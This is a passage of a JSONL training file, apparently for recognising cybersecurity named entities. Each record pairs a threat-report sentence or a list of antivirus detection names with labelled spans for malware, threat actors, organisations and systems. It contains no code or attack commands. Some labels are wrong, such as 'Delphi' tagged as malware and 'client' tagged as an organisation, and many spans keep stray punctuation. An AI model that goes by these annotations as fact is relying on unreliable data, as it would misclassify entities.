The Magnitude Exploit Kit": [[206, 247]], "MALWARE: exploit,": [[260, 268]], "VULNERABILITY: vulnerability,": [[312, 326]], "MALWARE: crypto-ransomware": [[356, 373]], "SYSTEM: target systems.": [[385, 400]]}, "info": {"id": "cyner2_train_005745", "source": "cyner2_train"}} {"text": "In the listed indicators of compromise, we noticed domains that we had seen used in a distinct skimming campaign which didn't seem to be documented yet.", "spans": {"THREAT_ACTOR: distinct skimming campaign": [[86, 112]]}, "info": {"id": "cyner2_train_005746", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropped:Trojan.Script.32120 Trojan.Script.D7D78 Win32.Trojan.WisdomEyes.16070401.9500.9925 Dropped:Trojan.Script.32120 Script.Trojan.Script.Eddq Dropped:Trojan.Script.32120 Trojan.DownLoad1.58708 Dropped:Trojan.Script.32120 Trojan/Win32.Xema.C28003 Dropped:Trojan.Script.32120", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005748", "source": "cyner2_train"}} {"text": "It also used multiple anti-analysis techniques and the final payload was written in Delphi which is quite unique to the banking trojan landscape.", "spans": {"MALWARE: the final payload": [[51, 68]], "MALWARE: Delphi": [[84, 90]], "MALWARE: the banking trojan": [[116, 134]]}, "info": {"id": "cyner2_train_005749", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Cloda4a.Trojan.4db2 Backdoor/W32.EvilBot.49184.D Backdoor/Evilbot.a Backdoor.Evilbot!ON36921kndI Backdoor.Evilbot BKDR_EVILBOT.A Backdoor.Win32.Evilbot.a Trojan.Win32.Evilbot.dgrj Backdoor.Win32.A.Evilbot.49184 Backdoor.Win32.Brat BackDoor.Brat BDS/Brat.A BKDR_EVILBOT.A Trojan[Backdoor]/Win32.Evilbot Win32.Hack.EvilBot.a.kcloud W32/Risk.PNHY-7386 Bck/Evilbot.H PE:Trojan.Evilbot.a!1173766179 Backdoor.Win32.Evilbot W32/EvilBot.A2!tr Backdoor.Win32.Evilbot.AMnQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005750", "source": "cyner2_train"}} {"text": "Report on APT attacks 
against Korea by AhnLab.", "spans": {"THREAT_ACTOR: APT": [[10, 13]], "ORGANIZATION: AhnLab.": [[39, 46]]}, "info": {"id": "cyner2_train_005753", "source": "cyner2_train"}} {"text": "Phones ? November 16 , 2016 In what 's being chalked up as an apparent mistake , more than 120,000 Android phones sold in the U.S. were shipped with spying code that sent text messages , call logs and other sensitive data to a server in Shanghai .", "spans": {"SYSTEM: Android": [[99, 106]]}, "info": {"id": "cyner2_train_005755", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeSmssV.Trojan Backdoor/W32.Jewdo.14848 Backdoor.Win32.Jewdo!O Backdoor.Jedobot.A4 Trojan.Downloader Backdoor/Jewdo.a WORM_JEWDO.SMD Win32.Backdoor.Dipeok.b W32/Trojan3.PWU Backdoor.Warbot WORM_JEWDO.SMD Win.Downloader.94233-1 Trojan.Win32.Fsysna.diom Trojan.Win32.Jewdo.rvcd Backdoor.Win32.Jewdo.14848 Troj.W32.Fsysna.tnhD BackDoor.Ddoser.432 Backdoor.Win32.Jewdo W32/Trojan.YZKF-7158 Trojan[Backdoor]/Win32.Jewdo Win32.Hack.Jewdo.kcloud Backdoor:Win32/Jedobot.A Trojan.Win32.Fsysna.diom Trojan/Win32.Jewdo.R4708 Backdoor.Jewdo Trojan.Dipeok.A Win32/Dipeok.A Backdoor.Win32.Jewdo.a W32/Jewdo.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005756", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/Delf.aarf Trojan.Win32.Delf.djezh Backdoor.Trojan Malware.XSSC BKDR_DELF.RFY Backdoor.Win32.Delf.aarf Backdoor.Delf!KqYaW6LeN/8 BKDR_DELF.RFY Backdoor:Win32/Dekara.A Backdoor/Win32.Delf Backdoor.Delf Backdoor.Trojan!rem Trojan-Dropper.Delf W32/Delf.AARF!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005757", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9996 BehavesLike.Win32.Backdoor.cc Backdoor:Win32/Govrat.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005758", "source": "cyner2_train"}} {"text": "Based on data aggregated from a 
controlled sinkhole, Fidelis Cybersecurity has observed some notable changes with the primary command and control C&C and conducted in-depth analysis of the secondary C&C Domain Generation Algorithim DGA.", "spans": {"ORGANIZATION: Fidelis Cybersecurity": [[53, 74]], "SYSTEM: C&C Domain Generation Algorithim DGA.": [[199, 236]]}, "info": {"id": "cyner2_train_005759", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.PopUpper!O Worm.Shamli.A3 Trojan.PopUpper.Win32.66 Trojan.ShellStartup.E6CAF2 Win32.Trojan.WisdomEyes.16070401.9500.9949 Trojan.Win32.PopUpper.eg W32.Virut.low6 Trojan.MulDrop3.38938 BehavesLike.Win32.VBObfus.tz Trojan/PopUpper.bi Trojan/Win32.PopUpper Worm:Win32/Shamli.A Trojan.Win32.A.PopUpper.1695744 Trojan.Win32.PopUpper.eg Trojan/Win32.PopUpper.R52146 MAS.Trojan.VB.0879 Win32/VB.ODX Trojan.Win32.PopUpper W32/Popupper.A!tr Trj/Shamli.A Win32/Trojan.41d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005762", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper.Joiner Trojan.DR.Joiner!+J8FCDf4wyY W32/Dropper.AVHN Backdoor.Colfusion W32/Microjoin.IG Win32/Joiner.U BKDR_JOINER.U Trojan-Dropper.Win32.Joiner.u Trojan.Dropper.Joiner Trojan-PWS.Win32.Atrojan!IK TrojWare.Win32.TrojanDropper.Joiner.U Trojan.Dropper.Joiner Trojan.MulDrop.210 BKDR_JOINER.U TrojanDropper.Win32.Joiner.u Trojan.Dropper.Joiner W32/Dropper.AVHN Dropper/Joiner.44544 Win32/TrojanDropper.Joiner.U Dropper.Joiner.by Trojan-PWS.Win32.Atrojan W32/Joiner.U!tr Dropper.Delf.AW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005763", "source": "cyner2_train"}} {"text": "A backdoor also known as: Riskware.Confuser! 
Trojan.Win32.SteamBurglar.dmdrlr Trojan.SteamBurglar.621 Trojan.Katusha.Win32.39398 BehavesLike.Win32.Backdoor.cc TR/Confuser.181248 MSIL/Injector.LTM!tr PWS:MSIL/Stimilini.C Trj/CI.A Trojan.MSIL.Stimilik MSIL6.AKRX Trojan.MSIL.Stimilik.DT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005764", "source": "cyner2_train"}} {"text": "DotRunpeX is a new injector written in .NET using the Process Hollowing technique and used to infect systems with a variety of known malware families.", "spans": {"MALWARE: DotRunpeX": [[0, 9]], "MALWARE: new injector": [[15, 27]], "SYSTEM: .NET": [[39, 43]], "SYSTEM: systems": [[101, 108]], "MALWARE: malware families.": [[133, 150]]}, "info": {"id": "cyner2_train_005765", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Sdbot.worm Backdoor.Shark.Win32.1896 Backdoor/Shark.ed Win32.Trojan.WisdomEyes.16070401.9500.9984 W32/Backdoor2.ETS Packed.Win32.Black.a Trojan.Win32.Shark.wxsv Packer.W32.Black.lbw7 Packed.Win32..Black.~A Trojan.Packed.650 W32/Sdbot.worm BDS/Shark.N Trojan[Packed]/Win32.Black Win32.Hack.Shark.eu.kcloud Backdoor:Win32/Sharke.H Backdoor.Win32.Shark.1483254 Packed/Win32.Black.C34704 Win32/Shark.RU Backdoor.Win32.Shark W32/Packed.2D18!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005766", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.243F Backdoor.Win32.HacDef.073!O Win32.Trojan.WisdomEyes.16070401.9500.9837 Backdoor.HackDefender Win.Trojan.PcClient-54 Backdoor.Win32.Hupigon.p Trojan.Win32.Maran.enrszy Backdoor.W32.Rbot.lgxa BackDoor.HackDef.239 Backdoor/HacDef.084 BDS/Hacdef.084 Trojan[Backdoor]/Win32.Hupigon Backdoor.Win32.A.Hupigon.41500 Backdoor.Win32.Hupigon.p Trojan/Win32.Xema.C75969 Trojan.Obfuscated!wEhK/9pikzI Trojan-Dropper.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005767", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PSW.Glacier TrojanPWS.Glacier 
Trojan.PSW.Glacier Trojan/PSW.glacier W32/Glacier.A Win32/GDoor.F BKDR_GLACIER.A Win.Spyware.9313-2 Trojan.PSW.Glacier Trojan-PSW.Win32.Glacier Trojan.PSW.Glacier Trojan.Win32.Glacier.furm Troj.Psw.W32!c Win32.Trojan-qqpass.Qqrob.Hyx Trojan.PSW.Glacier TrojWare.Win32.PSW.Glacier Trojan.PSW.Glacier Trojan.PWS.Glacier Trojan.Glacier.Win32.8 BKDR_GLACIER.A BackDoor-FR.svr W32/Glacier.UXNT-8441 Backdoor/G_Door.b Trojan.PSW.Glacier Trojan.Win32.Glacier Trojan-PSW.Win32.Glacier Win-Trojan/GDoor.262144 BackDoor-FR.svr TrojanPSW.Glacier Trojan.Glacier Win32/PSW.Glacier Trojan.PWS.Glacier!4KEClY9FaHQ Trojan-PWS.Win32.Glacier W32/Glacier.A!tr.pws Win32/Trojan.ff1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005768", "source": "cyner2_train"}} {"text": "The incident took place in the network of an East Asian company that develops data-loss prevention DLP software.", "spans": {"SYSTEM: the network": [[27, 38]], "ORGANIZATION: East Asian company": [[45, 63]], "SYSTEM: data-loss prevention DLP software.": [[78, 112]]}, "info": {"id": "cyner2_train_005770", "source": "cyner2_train"}} {"text": "This group was named Winnti", "spans": {"THREAT_ACTOR: group": [[5, 10]], "THREAT_ACTOR: Winnti": [[21, 27]]}, "info": {"id": "cyner2_train_005771", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.P2P.Spear.E Win32.P2P.Spear.E I-Worm.Spear.d.n8 W32/Spear.worm.d!p2p Worm.Spear.Win32.12 W32/Spear.d Win32.P2P.Spear.E Trojan.Win32.Spear.enxr W32/Spear.D W32.HLLW.Yoohoo Spear.M Win32/Spear.G WORM_SPEAR.D P2P-Worm.Win32.Spear.d Worm.P2P.Spear.D Worm.Win32.P2P-Spear.15360[h] Win32.P2P.Spear.E Worm.Win32.Spear.D Win32.P2P.Spear.E Win32.HLLW.Spear.15360 WORM_SPEAR.D W32/Spear.worm.d!p2p W32/Spear.YBIW-1290 Worm/P2P.Spear.e Worm/P2P.Spear Worm.Spear.d.kcloud Worm:Win32/Spear.D Win32.P2P.Spear.E Win32/Spear.worm.40448 Win32.P2P.Spear.E W32/Spear.D Win32/Spear.D Win32.Worm-p2p.Spear.Efao Worm.P2P.Spear.Based W32/Spear.D!worm.p2p Worm.Win32.Spear.aAAZ", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005772", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanSpy.Neos.A3 Trojan.Razy.D1F24 TSPY_NEOS.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_NEOS.SM Win.Dropper.Skyneos-6192156-1 Trojan.Win32.KeyLogger.dbjjal TrojWare.MSIL.Spy.Keylogger.agk Trojan.MulDrop3.2465 Win32.Troj.Undef.kcloud TrojanSpy:MSIL/Neos.A Spyware.Keylogger Spyware/Win32.KeyLogger.R30636 Win32.Trojan.Spy.Wqdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005774", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Orsam.A3 TSPY_PATUN.SMHA Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.FakeAV Win32/Petun.B TSPY_PATUN.SMHA BehavesLike.Win32.PWSZbot.nm PWS:MSIL/Petun.A MSIL.Trojan-Spy.Petun.B Trojan.KeyLogger.MSIL Trojan-Spy.Win32.Zbot MSIL/KeyLogger.BA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005776", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Rat.10 Backdoor/W32.RAT.8192.B Backdoor.Rat Backdoor/RAT.10 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.XWXN-0597 Win32/Rat.10 BKDR_RAT.10 Win.Trojan.Rat-4 Backdoor.Rat.10 Backdoor.Win32.RAT.10 Backdoor.Rat.10 Trojan.Win32.RAT.bqzxxm Backdoor.Win32.Rat_10.Svr Backdoor.W32.RAT.10!c Backdoor.Rat.10 Troj/Rat-1.0B Backdoor.Win32.Rat-10._0 Backdoor.Rat.10 BackDoor.Rat.10 Backdoor.RAT.Win32.24 BKDR_RAT.10 BehavesLike.Win32.PUP.xz Backdoor/Rat.10 Trojan[Backdoor]/Win32.RAT Backdoor:Win32/Rat.1_0 Backdoor.Rat.10 Backdoor.Win32.RAT.10 Backdoor.Rat.10 Backdoor.Rat.10 Bck/Rat.1_0 Rat.10 Win32.Backdoor.Rat.Szbj Backdoor.RAT!GoQkQzcwjDw W32/Rat.10!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005779", "source": "cyner2_train"}} {"text": "The malware is based on a freely-available open-source backdoor – something no one would expect from an alleged state-sponsored malware operator.", "spans": {"MALWARE: malware": [[4, 
11]], "MALWARE: freely-available open-source backdoor": [[26, 63]], "THREAT_ACTOR: malware operator.": [[128, 145]]}, "info": {"id": "cyner2_train_005780", "source": "cyner2_train"}} {"text": "Proofpoint researchers have recently observed the re-emergence of two malware downloaders that had largely disappeared for several months.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "MALWARE: malware downloaders": [[70, 89]]}, "info": {"id": "cyner2_train_005781", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_GE.1E00D038 Win32.Trojan.WisdomEyes.16070401.9500.9866 TROJ_GE.1E00D038", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005783", "source": "cyner2_train"}} {"text": "This research has proven valuable for Talos and led the development of better detection methods within the products we support along with the disruption of adversarial operations.", "spans": {}, "info": {"id": "cyner2_train_005784", "source": "cyner2_train"}} {"text": "Currently, the XData decryption tools are available.", "spans": {"SYSTEM: XData decryption tools": [[15, 37]]}, "info": {"id": "cyner2_train_005785", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Poison!O Backdoor.Poison Trojan.Heur.E84A91 Win32.Worm.VB.sn Trojan.FakeAV Backdoor.Win32.Poison.cwpk W32.W.VBNA.lsMe Win32.Backdoor.Poison.Pfjd Trojan.AVKill.11304 BehavesLike.Win32.RAHack.ct W32/Trojan.ULXW-4781 Backdoor.Poison.zo Trojan[Backdoor]/Win32.Poison Worm:Win32/Ructo.N Backdoor.Win32.Poison.cwpk Win32/Trojan.d07", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005788", "source": "cyner2_train"}} {"text": "Astrum was known to be have been exclusively used by the AdGholas malvertising campaign that delivered a plethora of threats including banking Trojans Dreambot/Gozi also known as Ursnif, and detected by Trend Micro as BKDR_URSNIF and RAMNIT TROJ_RAMNIT, PE_RAMNIT.", "spans": {"THREAT_ACTOR: Astrum": [[0, 6]], 
"THREAT_ACTOR: the AdGholas malvertising campaign": [[53, 87]], "MALWARE: threats": [[117, 124]], "MALWARE: banking Trojans Dreambot/Gozi": [[135, 164]], "MALWARE: Ursnif,": [[179, 186]], "ORGANIZATION: Trend Micro": [[203, 214]]}, "info": {"id": "cyner2_train_005790", "source": "cyner2_train"}} {"text": "This report reveals a campaign of reconnaissance, phishing, and malware operations that use content and domains made to mimic Chinese language news websites.", "spans": {"THREAT_ACTOR: campaign of reconnaissance, phishing,": [[22, 59]], "THREAT_ACTOR: malware operations": [[64, 82]]}, "info": {"id": "cyner2_train_005791", "source": "cyner2_train"}} {"text": "It means this was most likely the actual operator.", "spans": {}, "info": {"id": "cyner2_train_005792", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.LVBP Win32.Trojan.WisdomEyes.16070401.9500.9984 W32.SillyFDC TrojanSpy:MSIL/Ruzmoil.A Trojan/Win32.Keylogger.R17549", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005794", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Trojan Win32/Wykcores.A BKDR_MURCY.SM1 PE:Backdoor.Win32.Undef.cnd!1463577[F1] DLOADER.Trojan BKDR_MURCY.SM1 BehavesLike.Win32.Backdoor.qh Win32.Hack.PcClient.al.kcloud Trojan.Barys.955 Backdoor/Win32.Etso Backdoor:Win32/Wykcores.A Trojan-Downloader.Delphi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005795", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojandownloader.Rameh Backdoor/DsBot.ayd Backdoor.Win32.A.DsBot.3918918[UPX] BehavesLike.Win32.BadFile.vc Trojan-Downloader.Win32.Rameh TrojanDownloader:Win32/Rameh.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005796", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.Staser.f Backdoor.Trojan Win.Trojan.Yoddos-2 Trojan.Win32.Delf.ffdi W32.W.Runouce.lgxV BackDoor.MaosBoot.1707 BehavesLike.Win32.Trojan.mm 
Backdoor/Huigezi.2008.ybi Trojan[Backdoor]/Win32.Hupigon Trojan:Win32/Yoddos.C Backdoor/Win32.Trojan.C2392352 TScope.Malware-Cryptor.SB Trojan.Kryptik!+IjAt1MW7ss Trojan.Win32.SystemHijack", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005797", "source": "cyner2_train"}} {"text": "Attacks involving this Trojan have been noted since February 2017 but peaked in late May.", "spans": {"MALWARE: Trojan": [[23, 29]]}, "info": {"id": "cyner2_train_005798", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9857 Packed.Win32.Black.a Packer.W32.Black.l6cB Trojan.Packed.650 BehavesLike.Win32.Sdbot.tc BehavesLikeWin32.ExplorerHijack W32/Packed.2D18!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005800", "source": "cyner2_train"}} {"text": "Our researchers noted that IcedID has a modular malicious code with modern banking Trojan capabilities comparable to malware such as the Zeus Trojan.", "spans": {"ORGANIZATION: Our researchers": [[0, 15]], "MALWARE: IcedID": [[27, 33]], "MALWARE: modular malicious code": [[40, 62]], "MALWARE: modern banking Trojan": [[68, 89]], "MALWARE: malware": [[117, 124]], "MALWARE: the Zeus Trojan.": [[133, 149]]}, "info": {"id": "cyner2_train_005801", "source": "cyner2_train"}} {"text": "For example, most organizations have little to no DNS restrictions or security monitoring for DNS activity.", "spans": {"SYSTEM: DNS": [[50, 53], [94, 97]]}, "info": {"id": "cyner2_train_005802", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Downloader.Nekill.al Trojan.DL.Nekill.X Adware.Rugo Trojan-Downloader.Win32.Nekill.al Heuristic.BehavesLike.Win32.Downloader.J Trojan-Downloader.Win32.Nekill!IK Adware/MsLock.qg Trojan-Downloader.Nekill.al Adware.Rugo Trojan-Downloader.Win32.Nekill", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005805", "source": "cyner2_train"}} {"text": "These changes not only make it more 
difficult for the victim to identify what files have been encrypted, but also may thwart security protections currently in place for the CryptoWall threat.", "spans": {"MALWARE: CryptoWall threat.": [[173, 191]]}, "info": {"id": "cyner2_train_005811", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Barys.D1CD2 Win32.Trojan.WisdomEyes.16070401.9500.9968 Trojan.MSIL.Inject.abuiq Trojan/Windef.hm DDoS:Win32/Darktima.A Trojan.MSIL.Inject.abuiq TrojanFakeAV.Windef Trj/CI.A Win32.Trojan.Inject.dfju Trojan.DR.MSIL!M+jYeJcGakI Trojan.Win32.FakeAV W32/Dropper.FBQ!tr Win32/Trojan.f70", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005812", "source": "cyner2_train"}} {"text": "Consider the following phish delivered to the email address displayed on the bank's website.", "spans": {}, "info": {"id": "cyner2_train_005813", "source": "cyner2_train"}} {"text": "Eltima was very responsive and maintained an excellent communication with us throughout the incident.", "spans": {}, "info": {"id": "cyner2_train_005815", "source": "cyner2_train"}} {"text": "Beginning in December 2016, unconnected Middle Eastern human rights activists began to receive spearphishing messages in English and Persian that were not related to any previously-known groups.", "spans": {"ORGANIZATION: human rights activists": [[55, 77]], "THREAT_ACTOR: previously-known groups.": [[170, 194]]}, "info": {"id": "cyner2_train_005817", "source": "cyner2_train"}} {"text": "This campaign appears to be directly related to the launch and the ensuing discussion of North Korean missile technology.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "ORGANIZATION: North Korean missile technology.": [[89, 121]]}, "info": {"id": "cyner2_train_005818", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Downldr2.FYWH Hacktool.Rootkit Win32/Kerproc.A Win.Trojan.Rootkit-5417 Trojan.Win32.NtRootKit.duatym Trojan.DownLoader12.58402 
W32/Downloader.QURR-6406 Trojan[Rootkit]/Win32.Small TrojanDropper:Win32/Bodsuds.A Dropper/Win32.Downloader.R143536 Rootkit.Win32.SMA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005819", "source": "cyner2_train"}} {"text": "While the current campaign from this attacker has been active for a couple of months, there is evidence of activity by this attacker as far back as 2013, employing other backdoors such as Saker, Netbot and DarkStRat", "spans": {"THREAT_ACTOR: campaign": [[18, 26]], "THREAT_ACTOR: attacker": [[37, 45], [124, 132]], "MALWARE: backdoors": [[170, 179]], "MALWARE: Saker, Netbot": [[188, 201]], "MALWARE: DarkStRat": [[206, 215]]}, "info": {"id": "cyner2_train_005823", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DownLoader6.51149 RKIT/Mon.A Backdoor:Win32/Feljina.B Trojan.Graftor.DE2AD TScope.Trojan.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005824", "source": "cyner2_train"}} {"text": "It is spread presumably via ShellShock vulnerabilities.", "spans": {"VULNERABILITY: ShellShock vulnerabilities.": [[28, 55]]}, "info": {"id": "cyner2_train_005825", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.HiddenTear.H Ransom.Ryzerlo.A3 Trojan.Ransom.HiddenTear.H Ransom.HiddenTear Ransom_CRYPTEAR.SM0 Trojan.Win32.Hesv.crqo Trojan.Ransom.HiddenTear.H Trojan.Ransom.HiddenTear.H Trojan.Encoder.10598 Ransom_CRYPTEAR.SM0 Ransom:MSIL/Ryzerlo.A Trojan.Win32.Hesv.crqo Trojan.Ransom.HiddenTear.H Trj/GdSda.A Win32.Trojan.Fakedoc.Auto Trojan-Ransom.HiddenTear Win32/Trojan.504", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005826", "source": "cyner2_train"}} {"text": "However, recently, we have observed cases where PoisonIvy with expanded features in its communication function were used for attacks.", "spans": {"MALWARE: PoisonIvy": [[48, 57]]}, "info": {"id": "cyner2_train_005827", "source": "cyner2_train"}} {"text": "They might 
be Jaff ransomware or might be Dridex banking Trojan or Trickbot banking Trojan.", "spans": {"MALWARE: Jaff ransomware": [[14, 29]], "MALWARE: Dridex banking Trojan": [[42, 63]], "MALWARE: Trickbot banking Trojan.": [[67, 91]]}, "info": {"id": "cyner2_train_005829", "source": "cyner2_train"}} {"text": "It turns out that this campaign had an association to 2016 Fancy Bear activity previously identified by the German Federal Office for the Protection of the Constitution BfV.", "spans": {"THREAT_ACTOR: campaign": [[23, 31]], "THREAT_ACTOR: Fancy Bear": [[59, 69]], "ORGANIZATION: the German Federal Office for the Protection of the Constitution BfV.": [[104, 173]]}, "info": {"id": "cyner2_train_005831", "source": "cyner2_train"}} {"text": "Also of particular interest from an attribution obfuscation perspective is direct IP crossover with previous Dynamic DNS domains associated with known CN-APT activity.", "spans": {"THREAT_ACTOR: CN-APT activity.": [[151, 167]]}, "info": {"id": "cyner2_train_005832", "source": "cyner2_train"}} {"text": "It has strong behavioral ties to Ke3chang and is being used in an ongoing attack campaign against Indian embassy personnel worldwide.", "spans": {"MALWARE: Ke3chang": [[33, 41]], "THREAT_ACTOR: attack campaign": [[74, 89]], "ORGANIZATION: Indian embassy personnel worldwide.": [[98, 133]]}, "info": {"id": "cyner2_train_005833", "source": "cyner2_train"}} {"text": "It involves modifying browser proxy configurations and capturing traffic between a client and a server, acting as Man-In-The-Middle.", "spans": {"ORGANIZATION: client": [[83, 89]], "ORGANIZATION: server,": [[96, 103]]}, "info": {"id": "cyner2_train_005834", "source": "cyner2_train"}} {"text": "Late last year, a wave of cyber-attacks hit several critical sectors in Ukraine.", "spans": {"ORGANIZATION: critical sectors": [[52, 68]]}, "info": {"id": "cyner2_train_005836", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.LocktETTc.Worm Trojan.Miuref.S21958 
Trojan.MalPack Variant.Symmi.m8Nr Win32.Trojan.WisdomEyes.16070401.9500.9995 BehavesLike.Win32.Miuref.tc Trojan.Win32.Miuref Trojan.Miuref.3 Trojan:Win32/Miuref.B Win32.Trojan.Miuref.Wqws Win32/Trojan.eb2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005837", "source": "cyner2_train"}} {"text": "Its primary institutional targets have included government bodies, diplomatic institutions, and military forces and installations in NATO member states and certain Eastern European countries.", "spans": {"ORGANIZATION: government bodies, diplomatic institutions,": [[48, 91]], "ORGANIZATION: military forces": [[96, 111]], "ORGANIZATION: NATO member states": [[133, 151]], "ORGANIZATION: Eastern European countries.": [[164, 191]]}, "info": {"id": "cyner2_train_005838", "source": "cyner2_train"}} {"text": "After the cyber attack on the German Bundestag in 2015, some protective functions that the BSI has established for government networks have also been adopted by the German Bundestag for its own networks.", "spans": {"ORGANIZATION: the German Bundestag": [[26, 46], [161, 181]], "ORGANIZATION: BSI": [[91, 94]], "ORGANIZATION: government networks": [[115, 134]], "SYSTEM: own networks.": [[190, 203]]}, "info": {"id": "cyner2_train_005839", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D5ABC0 BackDoor.IRC.Skynet.69 BehavesLike.Win32.AdwareLinkury.dc W32/Trojan.ETUC-5276 Trojan[Spy]/Win32.Zbot Trojan:Win32/Zeeborot.A Trj/CI.A BackDoor.Skynet! 
Trojan.Win32.Zeeborot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005840", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Darkhotel.692224 Trojan.Inexsmar.r5 Trojan/Inexsmar.a Trojan.Zusy.D25651 W32/Trojan.GJSD-2947 Win32/Inexsmar.A TROJ_INEXSMAR.SMA Trojan.Win32.Darkhotel.c Trojan.Win32.Darkhotel.duiemo Trojan.Win32.Z.Darkhotel.692224[h] Trojan/Win32.Darkhotel Trojan:Win32/Inexsmar.A Troj.W32.Darkhotel.c!c Trojan/Win32.DarkHotel Win32.Trojan.Darkhotel.Pftk Trojan.Darkhotel! Trojan.Win32.Inexsmar W32/Darkhotel.C!tr Trojan.Win32.Darkhotel.c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005841", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Inject.FC.363 Trojan.MSILKrypt.57 BKDR_HPNOANCOOE.SM Win32.Trojan.WisdomEyes.16070401.9500.9998 BKDR_HPNOANCOOE.SM Trojan.DownLoader24.26511 Trojan.Injector.Win32.512453 Trojan.MSIL.Crypt Trojan.MSIL.fwua TR/Dropper.MSIL.uuodb Trojan:MSIL/Kuhaname.A Trojan/Win32.MSIL.C957690 Trojan.Malicious Trojan.Injector!2xVDVY5re4U Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005843", "source": "cyner2_train"}} {"text": "Category: Unit 42 Tags: EITest, HoeflerText, malware, RAT", "spans": {"ORGANIZATION: Unit 42": [[10, 17]], "MALWARE: EITest, HoeflerText, malware, RAT": [[24, 57]]}, "info": {"id": "cyner2_train_005845", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.Downloader.N Android.Trojan.Downloader.KY Other:Android.Reputation.2 Android.Trojan.Downloader.KY A.L.Rog.BlackCert Android.HiddenAds.171.origin Android.Trojan.Downloader.KY Android-Trojan/Boosad.3b718 a.gray.hiddendown.g Trojan.AndroidOS.Hiddenapp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005847", "source": "cyner2_train"}} {"text": "A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label the Lotus Blossom 
